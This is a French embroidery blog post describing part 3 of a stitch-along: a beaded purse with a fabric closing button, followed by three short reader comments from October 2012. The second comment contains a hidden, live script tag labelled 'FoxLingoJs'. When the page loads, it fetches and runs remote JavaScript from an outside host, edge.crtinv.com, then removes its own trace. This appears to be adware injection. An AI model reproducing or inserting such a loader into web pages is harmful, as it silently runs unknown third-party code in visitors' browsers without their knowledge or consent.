• sal de DODO

    coucou

     

    comment allez vous par ce temps un temps a bricoler a la maison

     

    j'ai rattrapé mon retard sur ce SAL organisé par Dodo Dodo d'Halatte

     

    voici la partie 3

    sal de DODO

    la bourse commence a prendre forme

    sal de DODO

    un petit bouton en tissu pour fermer la bourse en bas  la suite demain je crois que l'on va faire l'intérieur

    voilà bonne journée et bonnes petites xxxx

    patricia

    « monumentbroderie de perles »

  • Commentaires

    1
    Dimanche 14 Octobre 2012 à 20:19

    En voilà un superbe sac,bravo!

    2
    Mardi 16 Octobre 2012 à 06:01

    Gagné !! Bizz

    <script id="FoxLingoJs" type="text/javascript">// <![CDATA[ !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}(); // ]]></script>

    3
    Mardi 16 Octobre 2012 à 19:31

    rho, trop beau, moi aussi je le fais mais je ne l'ai pas mis sur mon blog (c'est pour une surprise....) bisous.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :